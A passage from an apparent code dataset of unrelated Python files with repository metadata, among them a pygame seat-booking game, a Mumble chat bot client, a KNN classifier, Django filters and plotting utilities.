for laser in lasers:\n if laser.event_id in [0, 'b']:\n continue\n for button in buttons:\n if button.event_id in [0, 'b']:\n continue\n if laser.event_id == button.event_id:\n event_link.append((laser, button))\n for receiver in receivers:\n if receiver.event_id in [0, 'b']:\n continue\n if laser.event_id == receiver.event_id:\n event_link.append((laser, receiver))\n\n\n for laser in lasers:\n if world_map2[laser.x + 1][laser.y] == 'Z':\n laser.direction = 'left'\n elif world_map2[laser.x - 1][laser.y] == 'Z':\n laser.direction = 'right'\n elif world_map2[laser.x][laser.y + 1] == 'Z':\n laser.direction = 'up'\n elif world_map2[laser.x][laser.y - 1] == 'Z':\n laser.direction = 'down'\n laser.images()\n\n for entity in lasers + doors:\n if entity.reverse:\n entity.on = True\n\n\n floor_screen = floor_blit(world_map1, textures)\n\n\n return (world_map1, world_map2, world_map3), spawn_pos, end_pos, jump, size, doors, cubes, buttons, event_link,\\\n lasers, floor_screen, receivers, direction\n\n\n# def scan(text_map):\n# spawn_pos = 0,0\n# end_pos = 0,0\n# world_map = map()\n# for j, row in enumerate(text_map):\n# if row == '@\\n':\n# for t, row2 in enumerate(text_map):\n# if row2 == 'jump =\\n':\n# jump = int(text_map.readline(t + j + 1))\n# return world_map, spawn_pos, end_pos, jump\n# for i, char in enumerate(row):\n# if char == '\\n':\n\n\ndef next_level(number, textures):\n text_level = open(f'levels/level_{number}', 'r')\n\n s = scan(text_level, textures)\n text_level.close()\n return s\n","repo_name":"semakol/split_game","sub_path":"maping.py","file_name":"maping.py","file_ext":"py","file_size_in_byte":7749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33615077567","text":"\nimport sys\nimport torch\n#from utils.salgan_generator import create_model\nfrom utils.salgan_generator import create_model, add_bn\nfrom utils.salgan_utils import load_image, postprocess_prediction\nfrom utils.salgan_utils import normalize_map\n\nfrom utils.sendTelegram import send\n\nimport cv2\nimport os\nimport random\nimport numpy as np\n\nfrom IPython import embed\n\nPATH_PYTORCH_WEIGHTS = '../trained_models/salgan_baseline.pt'\nUSE_GPU=True\nSALGAN_RESIZE = (192, 256) # H, W\nsize = None\nbgr_mean=[103.939, 116.779, 123.68]\nmodel = create_model(3)\nmodel.load_state_dict(torch.load(PATH_PYTORCH_WEIGHTS)['state_dict'])\nmodel.eval()\n\n# if GPU is enabled\nif USE_GPU:\n\tmodel.cuda()\n\n\nfilename = '/home/dataset/DHF1K/dhf1k_frames/199/0199.jpg'\nimage = cv2.imread(filename) # BGR format\nimage2 = image[0:160,0:320]\nH, W, C = image.shape\nif size is None:\n size = SALGAN_RESIZE\n\nimage = cv2.resize(image, (size[1], size[0]), interpolation=cv2.INTER_AREA)\nimage = image.astype(np.float32)\nimage2 = cv2.resize(image2, (size[1], size[0]), interpolation=cv2.INTER_AREA)\nimage2 = image2.astype(np.float32)\n\nbgr_mean=np.array(bgr_mean)\nimage -= bgr_mean\nimage2 -= bgr_mean\n\n# convert to torch Tensor\nimage = torch.FloatTensor(image)\nimage2 = torch.FloatTensor(image2)\n\n# swap channel dimensions\nimage = image.permute(2,0,1)\nimage2 = image2.permute(2,0,1)\n\n\nif USE_GPU:\n\timage = image.cuda()\n\timage2 = image2.cuda()\n\nfor img, name in zip([image,image2],[\"nocrop.png\",\"crop.png\"]):\n\t# run model inference\n\tprediction = model.forward(img[None, ...]) # add extra batch dimension\n\n\t# get result to cpu and squeeze dimensions\n\tif USE_GPU:\n\t\tprediction = prediction.squeeze().data.cpu().numpy()\n\telse:\n\t\tprediction = prediction.squeeze().data.numpy()\n\n\t# postprocess\n\t# first normalize [0,1]\n\tprediction = normalize_map(prediction)\n\tsaliency = postprocess_prediction(prediction, (320,640))\n\tsaliency = normalize_map(saliency)\n\tsaliency *= 255\n\tcv2.imwrite(os.path.join(\"/home/saliency_maps/\", name),saliency)\n","repo_name":"juanjo3ns/SalBCE","sub_path":"src/utils/boxroom/cropcheck.py","file_name":"cropcheck.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"31080825720","text":"import os, sys, argparse\nfrom package.commands import initialize\n\nparser = argparse.ArgumentParser(prog=\"SlackQL\")\nparser.add_argument(\"-m\", \"--migrate\", nargs=\"*\", help=\"applying migration(s)\")\nparser.add_argument(\"-r\", \"--rollback\", nargs=\"*\", help=\"rollback migration(s)\")\n# parser.add_argument(\"-db\", \"--create\", nargs=\"*\", help=\"create database\")\n# parser.add_argument(\"-db\", \"--reset\", nargs=\"*\", help=\"drop database, create database then apply migrations\")\nparser.add_argument(\"-g\", \"--generate\", nargs=\"*\", help=\"automatically generate file(s). First argument can be 'migration' or 'model'.\")\nparser.add_argument(\"-i\", \"--init\", nargs=\"*\", help=\"create SlackQL related files in your project folder\")\nparser.add_argument(\"-d\", \"--database\", type=str, default=\"psql\", choices=[\"psql\", \"mysql\", \"sqlite3\"], help=\"select a db: default to psql\")\nparser.add_argument(\"-s\", \"--spaces\", type=int, default=2, help=\"define the number of spaces when generating files\")\nargs = parser.parse_args()\nif args.init:\n # consider moving config to a folder so it can be imported properly\n initialize.initialize_files(args.init, args.database, args.spaces)\n\nelif args.generate:\n if args.generate[0] == \"model\":\n initialize.create_model(args.generate[1:], args.spaces)\n elif args.generate[0] == \"migration\":\n initialize.generate_migration(args.generate[1][0], args.spaces)\n else:\n parser.error(\"Unrecognize generate option {}.\".format(args.generate[0]))\n\n# elif args.create:\n# pass\n# elif args.reset:\n# pass\nelif args.migrate:\n pass\n\nsys.exit(0)\n","repo_name":"makenneth/SlackQL","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9702871238","text":"import django_filters\nfrom django import forms\n\nfrom django_filters import *\nfrom django_filters.widgets import *\nfrom bootstrap_datepicker_plus import DatePickerInput, TimePickerInput, DateTimePickerInput, MonthPickerInput, YearPickerInput\nfrom datetime import *\n\nfrom customstaff.models import *\n\nclass teacherLeaveApplicationFilter(django_filters.FilterSet):\n\tcreated_at = DateFilter(label= 'Date Created', lookup_expr='gte')\n\tclass Meta:\n\t\tmodel = LeaveApplication\n\t\tfields = [\n\t\t'teachertimeofftype',\n\t\t'created_at'\n\t\t]\n\n\nclass nonteacherLeaveApplicationFilter(django_filters.FilterSet):\n\tcreated_at = DateFilter(label= 'Date Created', lookup_expr='gte')\n\n\tclass Meta:\n\t\tmodel = LeaveApplication\n\t\tfields = [\n\t\t'nonteachertimeofftype',\n\t\t'created_at'\n\t\t]\n\nclass LeaveApplicationFilter(django_filters.FilterSet):\n\tcreated_at = DateFilter(label= 'Date Created', lookup_expr='gte')\n\tstartdate = DateFilter(input_formats=('%d/%m/%Y'),label= 'Start Date', lookup_expr='gte', widget=MonthPickerInput(\n format='%d/%m/%Y',\n attrs={\n 'class': 'datepicker'\n }\n ))\n\t\n\n\tclass Meta:\n\t\tmodel = LeaveApplication\n\t\tfields = [\n\t\t\n\t\t'alltimeofftype',\n\t\t'stafftype',\n\t\t'user',\n\t\t'created_at',\n\t\t'startdate',\n\t\t'attachmentreceived',\n\t\t'attachmentrequired'\n\t\t]","repo_name":"wxwong0019/leave-management","sub_path":"users/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6069065843","text":"import numpy as np\nimport Utilities as utils\nfrom scipy.spatial import distance\n\n\nclass KNN:\n def __init__(self, k: int):\n self.k = k\n self.train_samples = None\n self.train_labels = None\n\n def reset(self):\n self.train_samples = None\n self.train_labels = None\n\n def _update_features(self, samples, features):\n updated_samples = []\n for sample in samples:\n updated_samples.append(np.multiply(sample, features))\n return updated_samples\n\n def fit(self, samples, labels, features=None):\n assert len(samples) == len(labels)\n assert len(samples) >= self.k\n if features:\n assert len(features) == len(samples[0])\n samples = self._update_features(samples, features)\n self.train_samples = samples\n self.train_labels = labels\n\n def _k_nearest(self, sample):\n dists = []\n for i, train_sample in enumerate(self.train_samples):\n dists.append(distance.euclidean(sample, train_sample))\n # dists.sort(key=lambda element: element[0])\n min_k_indexes = np.argpartition(dists, self.k)\n return min_k_indexes[:self.k]\n\n def _get_votes(self, distances):\n votes = [0, 0]\n for idx in distances:\n votes[self.train_labels[idx]] += 1\n return votes\n\n def _majority(self, distances):\n votes = self._get_votes(distances)\n return np.argmax(votes)\n\n def predict(self, samples, features=None) -> list:\n y_predict = []\n if features:\n assert len(features) == len(samples[0])\n samples = self._update_features(samples, features)\n for sample in samples:\n k_nearest = self._k_nearest(sample)\n y_predict.append(self._majority(k_nearest))\n return y_predict\n\n\ndef main():\n accuracies = []\n vals_of_k = [i for i in range(1, 51)]\n for i in vals_of_k:\n knn_results: utils.KNNResults = utils.run_knn_classifier(KNN, i, normlize_data=False)\n accuracies.append(knn_results.accuracy)\n print(accuracies)\n print(vals_of_k)\n utils.draw_graph(vals_of_k, accuracies, \"Value Of K\", \"Accuracy\", \"Graph of accuracy as a function of K\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"emeel97/KNN-Project","sub_path":"KNN1.py","file_name":"KNN1.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6956881510","text":"'''\nCreated on Feb 6, 2012\n\n@author: johannes\n'''\n \nimport socket\nimport ssl\nimport platform\nimport Mumble_pb2\nimport struct\nimport time\nimport thread\nimport sys\n\nclass mumbleConnection():\n '''\n This class represents a persistent connection to a mumble Server\n via TCP. Id doesn't support UDP and taking in account the fact that\n UDP is optional it most likely never will.\n '''\n\n host = None\n port = None\n password = None\n sock = None\n session = None\n channel = None\n _pingTotal = 1 \n running = False\n _textCallbacks = []\n\n\n _messageLookupMessage = {Mumble_pb2.Version:0, Mumble_pb2.UDPTunnel:1, Mumble_pb2.Authenticate:2, Mumble_pb2.Ping:3, Mumble_pb2.Reject:4, Mumble_pb2.ServerSync:5,\n Mumble_pb2.ChannelRemove:6, Mumble_pb2.ChannelState:7, Mumble_pb2.UserRemove:8, Mumble_pb2.UserState:9, Mumble_pb2.BanList:10, Mumble_pb2.TextMessage:11, Mumble_pb2.PermissionDenied:12,\n Mumble_pb2.ACL:13, Mumble_pb2.QueryUsers:14, Mumble_pb2.CryptSetup:15, Mumble_pb2.ContextActionAdd:16, Mumble_pb2.ContextAction:17, Mumble_pb2.UserList:18, Mumble_pb2.VoiceTarget:19,\n Mumble_pb2.PermissionQuery:20, Mumble_pb2.CodecVersion:21}\n \n _messageLookupNumber = {}\n \n def __init__(self, host, password, port, nickname, channel):\n \"\"\"\n Creates a mumble Connection but doesn't open it yet.\n \n @param host: Mumble server to connect to, as hostname or IP address\n @type host: String\n @param password: Server password, if the server doesn't have one, leave it empty or put in whatever you like to.\n @type password: String\n @param port: Port on which the mumble server listens.\n @type port: String\n @param channel: Channel name the bot should join.\n @type channel: String\n \"\"\" \n self.host = host\n self.password = password\n self.port = port\n self.nickname = nickname \n self.channel = channel\n \n for i in self._messageLookupMessage.keys():\n self._messageLookupNumber[self._messageLookupMessage[i]] = i\n\n def _pingLoop(self):\n while(self.running):\n self._sendPing()\n time.sleep(1)\n\n def _mainLoop(self):\n while(self.running):\n self._readPacket()\n\n def _parseMessage(self, msgType, stringMessage):\n msgClass = self._messageLookupNumber[msgType]\n message = msgClass()\n message.ParseFromString(stringMessage)\n return message\n \n def addChatCallback(self, trigger, function):\n \"\"\"\n Adds a function and a trigger for that function. Will execute the\n given function if the \"Trigger\" String occurs in channel tex\".\n \n @param trigger: Text trigger, currently NO regexp support\n @type trigger: String\n @param function: Function to be called, Strings it returns are written back to the channel.\n @type function: Python Function \n \"\"\"\n self._textCallbacks.append((trigger, function)) \n \n def _readTotally(self, size):\n message = \"\"\n while len(message) < size:\n received = self.sock.recv(size - len(message))\n message += received\n if len(received) == 0:\n #print(\"Nothing received!\")\n return None\n return message\n \n def _sendTotally(self, message):\n while len(message) > 0:\n sent = self.sock.send(message)\n if sent < 0:\n return False\n message = message[sent:]\n return True\n \n def _packageMessageForSending(self, msgType, stringMessage):\n length = len(stringMessage)\n return struct.pack(\">HI\", msgType, length) + stringMessage\n \n def connectToServer(self):\n \"\"\"\n Really connects to the mumble server\n \"\"\"\n if self.sock == None: \n #\n # Guttenberg'd from eve-bot\n #\n self.sock = socket.socket(type=socket.SOCK_STREAM)\n self.sock = ssl.wrap_socket(self.sock, ssl_version=ssl.PROTOCOL_TLSv1)\n self.sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)\n \n self.sock.connect((self.host, self.port))\n \n pbMess = Mumble_pb2.Version()\n pbMess.release = \"1.2.0\"\n pbMess.version = 66048\n pbMess.os = platform.system()\n pbMess.os_version = \"mumblebot lol\"\n \n initialConnect = self._packageMessageForSending(self._messageLookupMessage[type(pbMess)], pbMess.SerializeToString())\n \n pbMess = Mumble_pb2.Authenticate()\n pbMess.password = self.password\n pbMess.username = self.nickname\n if self.password != None:\n pbMess.password = self.password\n celtversion = pbMess.celt_versions.append(-2147483637)\n\n initialConnect += self._packageMessageForSending(self._messageLookupMessage[type(pbMess)], pbMess.SerializeToString())\n\n if not self._sendTotally(initialConnect):\n print(\"couldn't send, wtf?\")\n return\n else:\n self.running = True\n thread.start_new_thread(self._pingLoop, ()) \n thread.start_new_thread(self._mainLoop, ())\n \n def sendTextMessage(self, Text):\n \"\"\"\n Send text message to channel\n \n @param Text: Text that should be sent to channel\n @type Text: String\n \"\"\"\n pbMess = Mumble_pb2.TextMessage()\n # print(self.session)\n pbMess.session.append(self.session)\n pbMess.channel_id.append(self.channel)\n # pbMess.tree_id.append(())\n pbMess.message = Text\n\n packet = self._packageMessageForSending(self._messageLookupMessage[type(pbMess)], pbMess.SerializeToString())\n\n if not self._sendTotally(packet):\n print(\"couldnt't send text message, wtf?\")\n\n\n def _readPacket(self):\n meta = self._readTotally(6)\n \n \n if(meta != None):\n msgType, length = struct.unpack(\">HI\", meta)\n stringMessage = self._readTotally(length)\n #print (\"Message of type \"+str(msgType)+\" received!\")\n #print (stringMessage) \n \n if(not self.session and msgType == 5):\t\n message = self._parseMessage(msgType, stringMessage)\n self.session = message.session \n self._joinChannel()\n\n if(msgType == 1):\n print(stringMessage)\n sys.stdout.write(stringMessage[4:])\n if(msgType == 7):\n message = self._parseMessage(msgType, stringMessage)\n print(\"Channel \" + message.name + \": \" + str(message.channel_id))\n if(message.name == self.channel):\n self.channel = message.channel_id\n if(msgType == 11):\n message = self._parseMessage(msgType, stringMessage)\n for call in self._textCallbacks:\n if(call[0] == message.message):\n self.sendTextMessage(call[1]()) \n \n\n def closeConnection(self):\n \"\"\"\n Closes the connection\n \"\"\"\n self.running = False\n\n def _sendPing(self):\n pbMess = Mumble_pb2.Ping()\n pbMess.timestamp = (self.pingTotal * 5000000)\n pbMess.good = 0\n pbMess.late = 0\n pbMess.lost = 0\n pbMess.resync = 0\n pbMess.udp_packets = 0\n pbMess.tcp_packets = self.pingTotal\n pbMess.udp_ping_avg = 0\n pbMess.udp_ping_var = 0.0\n pbMess.tcp_ping_avg = 50\n pbMess.tcp_ping_var = 50\n self._pingTotal += 1\n packet = struct.pack(\">HI\", 3, pbMess.ByteSize()) + pbMess.SerializeToString() \n \n self.sock.send(packet)\n\n def _joinChannel(self):\n pbMess = Mumble_pb2.UserState()\n pbMess.session = self.session\n \n pbMess.channel_id = self.channel\n \n if not self._sendTotally(self._packageMessageForSending(self._messageLookupMessage[type(pbMess)], pbMess.SerializeToString())):\n print (\"Error sending join packet\")\n","repo_name":"waaaaargh/lolbot","sub_path":"mumbleConnection.py","file_name":"mumbleConnection.py","file_ext":"py","file_size_in_byte":8281,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"40582672434","text":"import paco.cftemplates\nfrom paco.application.res_engine import ResourceEngine\nfrom paco.core.yaml import YAML\n\nyaml=YAML()\nyaml.default_flow_sytle = False\n\nclass S3BucketResourceEngine(ResourceEngine):\n\n def init_resource(self):\n s3_ctl = self.paco_ctx.get_controller('S3')\n # If an account was not set, use the network default\n if self.resource.account == None:\n account_ctx = self.account_ctx\n else:\n account_ctx = self.paco_ctx.get_account_context(account_ref=self.resource.account)\n if self.resource.region:\n bucket_region = self.resource.region\n else:\n bucket_region = self.aws_region\n s3_ctl.init_context(\n account_ctx,\n bucket_region,\n self.resource.paco_ref_parts,\n self.stack_group,\n self.stack_tags,\n )\n s3_ctl.add_bucket(self.resource)\n","repo_name":"waterbear-cloud/paco","sub_path":"src/paco/application/reseng_s3bucket.py","file_name":"reseng_s3bucket.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"} +{"seq_id":"37718831114","text":"import pygame, sys, time, random\nfrom pygame.surfarray import array3d\nimport random\nimport pickle\n## Sets up colors for the game using RGB Codes\nBLACK = pygame.Color(0, 0, 0)\nWHITE = pygame.Color(255, 255, 255)\nRED = pygame.Color(255, 0, 0)\nGREEN = pygame.Color(0, 255, 0) \nwith open('seats.pkl', 'rb') as f:\n seats_coordinates = pickle.load(f)\n\nclass WorkerEnv():\n \n def __init__(self,frame_size_x,frame_size_y):\n '''\n Defines the initial game window size\n '''\n self.frame_size_x = frame_size_x\n self.frame_size_y = frame_size_y\n self.game_window = pygame.display.set_mode((self.frame_size_x, self.frame_size_y)) \n self.reset()\n \n def reset(self):\n '''\n Resets the game, along with the default Worker size and spawning seat.\n '''\n #self.game_window.fill(BLACK)\n\n\n self.Worker_pos = [100, 50]\n self.Worker_body = [[100, 50], [100-10, 50], [100-(2*10), 50]]\n self.seat_pos = self.spawn_seat()\n \n self.seat_spawn = True\n\n self.direction = \"RIGHT\"\n self.action = self.direction\n self.score = 0\n self.steps = 0\n print(\"Game Reset.\")\n \n def change_direction(self,action,direction):\n '''\n Changes direction based on action input. \n Checkes to make sure Worker can't go back on itself.\n '''\n \n if action == 'UP' and direction != 'DOWN':\n direction = 'UP'\n if action == 'DOWN' and direction != 'UP':\n direction = 'DOWN'\n if action == 'LEFT' and direction != 'RIGHT':\n direction = 'LEFT'\n if action == 'RIGHT' and direction != 'LEFT':\n direction = 'RIGHT'\n \n return direction\n \n def move(self,direction,Worker_pos):\n '''\n Updates Worker_pos list to reflect direction change.\n '''\n \n if direction == 'UP':\n Worker_pos[1] -= 10\n if direction == 'DOWN':\n Worker_pos[1] += 10\n if direction == 'LEFT':\n Worker_pos[0] -= 10\n if direction == 'RIGHT':\n Worker_pos[0] += 10\n \n return Worker_pos\n \n def eat(self):\n '''\n Returns Boolean indicating if Worker has \"taken\" the red seat square\n '''\n return self.Worker_pos[0] == self.seat_pos[0] and self.Worker_pos[1] == self.seat_pos[1]\n \n \n def spawn_seat(self):\n '''\n Spawns seat in a random location on window size\n '''\n\n \n #seat_pos_1=random.choice(seats_coordinates)\n #return[seat_pos_1[0], seat_pos_1[1]]\n return [random.randrange(1, (self.frame_size_x//10)) * 10, random.randrange(1, (self.frame_size_y//10)) * 10]\n \n def human_step(self,event): \n '''\n Takes human keyboard event and then returns it as an action string\n '''\n \n action = None\n \n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n ################################################ \n ########## CONVERT KEYPRESS TO DIRECTION ###### \n ############################################## \n elif event.type == pygame.KEYDOWN:\n \n if event.key == pygame.K_UP:\n action = 'UP'\n if event.key == pygame.K_DOWN:\n action = 'DOWN'\n if event.key == pygame.K_LEFT:\n action = 'LEFT'\n if event.key == pygame.K_RIGHT:\n action = 'RIGHT'\n # Esc -> Create event to quit the game\n if event.key == pygame.K_ESCAPE:\n pygame.event.post(pygame.event.Event(pygame.QUIT))\n \n return action\n \n \n \n def display_score(self,color, font, size):\n '''\n Updates the score in top left\n '''\n score_font = pygame.font.SysFont(font, size)\n score_surface = score_font.render('Score : ' + str(self.score), True, color)\n score_rect = score_surface.get_rect()\n score_rect.midtop = (self.frame_size_x/10, 15)\n self.game_window.blit(score_surface, score_rect)\n \n def game_over(self):\n '''\n Checks if the Worker has touched the bounding box or itself\n '''\n \n # TOUCH BOX\n #if self.Worker_pos[0] < 0 or self.Worker_pos[0] > self.frame_size_x-10:\n # self.end_game()\n #if self.Worker_pos[1] < 0 or self.Worker_pos[1] > self.frame_size_y-10:\n # self.end_game()\n\n # TOUCH OWN BODY\n #for block in self.Worker_body[1:]:\n # if self.Worker_pos[0] == block[0] and self.Worker_pos[1] == block[1]:\n # self.end_game()\n \n\n\n def end_game(self):\n '''\n \n '''\n message = pygame.font.SysFont('arial', 45)\n message_surface = message.render('Game has Ended.', True, RED)\n message_rect = message_surface.get_rect()\n message_rect.midtop = (self.frame_size_x/2, self.frame_size_y/4)\n self.game_window.fill(BLACK)\n self.game_window.blit(message_surface, message_rect)\n self.display_score(RED, 'times', 20)\n pygame.display.flip()\n time.sleep(3)\n pygame.quit()\n sys.exit()\n\n\nWorker_env = WorkerEnv(1024,768)\n\n# This is technically a FPS Refresh rate\n# Higher number means faster refresh, thus faster Worker movement, meaning harder game play\ndifficulty = 10\n\n\n# FPS (frames per second) controller\nfps_controller = pygame.time.Clock()\n\n# Checks for errors encountered\ncheck_errors = pygame.init()\n\n\n# Initialise game window\npygame.display.set_caption('Worker Booker') \n\n############## Custom additons ################\nimport random\nimport pickle\nwith open('seats.pkl', 'rb') as f:\n seats_coordinates = pickle.load(f)\n\n#Create a display surface\nWINDOW_WIDTH = 1024\nWINDOW_HEIGHT = 768\n\n#Set FPS amnd clock\nFPS = 60\nclock = pygame.time.Clock()\n\n#Set game values\nVELOCITY = 5\n\n#Load images\nman_image = pygame.image.load(\"point_yellow.png\")\nman_rect = man_image.get_rect()\nman_rect.topleft = (25, 25)\n\ndesktop_image = pygame.image.load(\"point_blue.png\")\ndesktop_rect = desktop_image.get_rect()\n\ndesktop_pos_1=random.choice(seats_coordinates)\ndesktop_rect.center = (desktop_pos_1[0], desktop_pos_1[1])\n\ndesktop_image2 = pygame.image.load(\"point_red.png\")\ndesktop_rect2 = desktop_image2.get_rect()\ndesktop_pos_2=random.choice(seats_coordinates)\ndesktop_rect2.center = (desktop_pos_2[0], desktop_pos_2[1])\n\n###################################\n#The main game loop\nrunning = True\nwhile running:\n \n # Check Input from Human Step \n for event in pygame.event.get():\n \n Worker_env.action = Worker_env.human_step(event)\n \n #if event.type == pygame.QUIT:\n # running = False\n\n\n # Check for Direction change based on action\n Worker_env.direction = Worker_env.change_direction(Worker_env.action,Worker_env.direction)\n print(Worker_env.Worker_pos)\n\n####################à\n \n #Get a list of all keys currently being pressed down\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_LEFT] and man_rect.left > 0:\n man_rect.x -= VELOCITY\n if keys[pygame.K_RIGHT] and man_rect.right < WINDOW_WIDTH:\n man_rect.x += VELOCITY\n if keys[pygame.K_UP] and man_rect.top > 0:\n man_rect.y -= VELOCITY\n if keys[pygame.K_DOWN] and man_rect.bottom < WINDOW_HEIGHT:\n man_rect.y += VELOCITY \n\n #Check for collision between two rects\n if man_rect.colliderect(desktop_rect):\n print(\"HIT NOT DESIRED\")\n #Respawn in a new position\n desktop_pos_new_1=random.choice(seats_coordinates)\n \n desktop_rect.x = desktop_pos_new_1[0]\n desktop_rect.y = desktop_pos_new_1[1]\n\n #Check for collision between two rects\n if man_rect.colliderect(desktop_rect2):\n print(\"HIT DESIRED\")\n #Respawn in a new position\n desktop_pos_new_2=random.choice(seats_coordinates)\n desktop_rect2.x = desktop_pos_new_2[0]\n desktop_rect2.y = desktop_pos_new_2[1]\n\n\n\n\n######################\n\n #Update Worker Position\n Worker_env.Worker_pos = Worker_env.move(Worker_env.direction,Worker_env.Worker_pos)\n\n\n # Check to see if we ate some seat\n Worker_env.Worker_body.insert(0, list(Worker_env.Worker_pos))\n if Worker_env.eat():\n Worker_env.score += 1\n Worker_env.seat_spawn = False\n else:\n Worker_env.Worker_body.pop()\n\n # Check to see if we need to spawn new seat \n if not Worker_env.seat_spawn:\n Worker_env.seat_pos = Worker_env.spawn_seat()\n Worker_env.seat_spawn = True\n\n \n # Worker_env.game_window.fill(BLACK)\n\n bg = pygame.image.load(\"background.png\")\n #INSIDE OF THE GAME LOOP\n Worker_env.game_window.blit(bg, (0, 0))\n\n ################\n #Draw rectangles to represent the rect's of each object\n pygame.draw.rect(Worker_env.game_window, (0, 255, 0), man_rect, 1)\n pygame.draw.rect(Worker_env.game_window, (255, 255, 0), desktop_rect, 1)\n pygame.draw.rect(Worker_env.game_window, (255, 255, 0), desktop_rect2, 1)\n\n\n #Blit assets\n Worker_env.game_window.blit(man_image, man_rect)\n Worker_env.game_window.blit(desktop_image, desktop_rect)\n Worker_env.game_window.blit(desktop_image2, desktop_rect2)\n\n ##### \n # Draw the Worker\n \n for pos in Worker_env.Worker_body:\n pygame.draw.rect(Worker_env.game_window, GREEN, pygame.Rect(pos[0], pos[1], 10, 10))\n \n # Draw seat\n pygame.draw.rect(\n \n Worker_env.game_window, RED, \n pygame.Rect(Worker_env.seat_pos[0], \n Worker_env.seat_pos[1], 10, 10)\n \n )\n\n # Check if we lost\n Worker_env.game_over()\n \n \n\n Worker_env.display_score(BLACK, 'consolas', 20)\n # Refresh game screen\n pygame.display.update()\n # Refresh rate\n fps_controller.tick(difficulty)\n img = array3d(Worker_env.game_window) ","repo_name":"ruslanmv/How-to-create-custom-Reinforcement-Learning-environment","sub_path":"custom_game/basics_py/0_Custom_worker_env.py","file_name":"0_Custom_worker_env.py","file_ext":"py","file_size_in_byte":10016,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"42075759560","text":"import argparse\nimport matplotlib\n\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\n\nfrom rlo import experiment_result\nfrom rlo import plotting\nfrom rlo import utils\nimport numpy as np\n\n\ndef average_of_counter(ctr):\n return sum([float(k) * v for k, v in ctr.items()]) / sum(ctr.values())\n\n\ndef plot_search_summary(outfile, title_suffix, events, alg):\n if alg not in [\"rollout\", \"astar\", \"beam\", \"hybrid\"]:\n raise ValueError(\"Unknown search algorithm {}\".format(alg))\n joined_events = plotting.join(\n [e for e in events if e[\"event\"] == \"rollout_end\" and \"eval_expr\" not in e],\n [e for e in events if e[\"event\"] == \"search\"],\n lambda r: (r[\"repetition\"], r[\"generation\"], r[\"expr\"]),\n ).values() # Discard the join keys\n\n x_axis_func = lambda r: r[\"generation\"]\n by_expr = utils.group_by(joined_events, lambda r: r[\"expr\"])\n # Two plots for each expression, one above the other so x-axes line up\n fig, axs = plt.subplots(\n 2, len(by_expr), figsize=[6 * len(by_expr), 6], squeeze=False,\n )\n assert len(axs) == 2 and len(axs[0]) == len(by_expr) and len(axs[1]) == len(by_expr)\n for ax1, ax2, (expr, logs) in zip(axs[0], axs[1], by_expr.items()):\n reps = plotting.pad_into_lists(\n utils.group_by(logs, lambda r: r[\"repetition\"]).values(), x_axis_func\n )\n # An generation may be a fixed number of varying expressions, so allow some exprs to be missing.\n reps = [\n plotting.carry_back_first(plotting.carry_previous_over_none(rep))\n for rep in reps\n ]\n x_vals = range(1, len(reps[0]) + 1)\n\n def plot(ax, fn, colnum, label):\n plotting.plot_with_confidence(\n ax,\n x_vals,\n [[fn(r) for r in rep] for rep in reps],\n plotting.colors(colnum),\n label=label,\n )\n\n expr_str = str(expr)\n expr_str = utils.format_expr(expr_str, 50)\n\n # First subplot: three axes.\n ax1.set_title(\"{} results\".format(expr_str))\n # - Min-cost-found on left-side log axis\n plot(ax1, lambda r: min([float(c) for c in r[\"final_costs\"]]), 1, \"best_cost\")\n start_costs = [r[\"expr_cost\"] for r in logs if \"expr_cost\" in r]\n if len(start_costs) > 0:\n ax1.plot(\n [0, max(x_vals)],\n [utils.single_elem(set(start_costs))] * 2,\n linestyle=\"--\",\n color=plotting.colors(1),\n linewidth=1,\n )\n ax1.set_yscale(\"log\")\n ax1.set_ylabel(\"best_cost\", color=plotting.colors(1))\n ax1.tick_params(axis=\"y\", colors=plotting.colors(1), which=\"both\")\n\n # - Average episode length on linear scale on rhs\n ax1b = ax1.twinx()\n plot(ax1b, lambda r: average_of_counter(r[\"episode_lengths\"]), 2, \"avg_ep_len\")\n ax1b.set_ylabel(\"avg_ep_len\", color=plotting.colors(2))\n ax1b.tick_params(\n axis=\"y\", colors=plotting.colors(2), which=\"both\", direction=\"in\"\n )\n\n # - Number of generated episodes on a separate log scale also on rhs\n ax1c = ax1.twinx()\n plot(\n ax1c, lambda r: sum(r[\"episode_lengths\"].values()), 3, \"#episodes\"\n ) # Unlike final_costs, episode_lengths works for both A* and Rollout.\n ax1c.set_yscale(\"log\")\n ax1c.set_ylabel(\"#episodes\", color=plotting.colors(3))\n ax1c.tick_params(\n axis=\"y\", colors=plotting.colors(3), which=\"both\", direction=\"out\"\n )\n ax1c.spines[\"right\"].set_position((\"axes\", 1.2))\n ax1c.spines[\"right\"].set_visible(True)\n\n # Second subplot: two axes\n ax2.set_title(\"{} details\".format(expr_str))\n # - One log scale, with positions evaluated and tl_cache_hits (and others IF A*)\n plot(ax2, lambda r: float(r[\"posns_evaluated\"]), 4, \"p_posns_evald\")\n plot(ax2, lambda r: float(r[\"tl_cache_hits\"]), 5, \"p_tl_cache\")\n ax2.set_ylabel(\"posns p_\") # This is the scale for all things beginning p_\n ax2.set_yscale(\n \"log\"\n ) # - One linear scale, with batch size (and others IF rollout)\n # - One linear scale, with batch size (and others IF rollout)\n ax2b = ax2.twinx()\n # np.float64 does not produce error with 0 division, for example 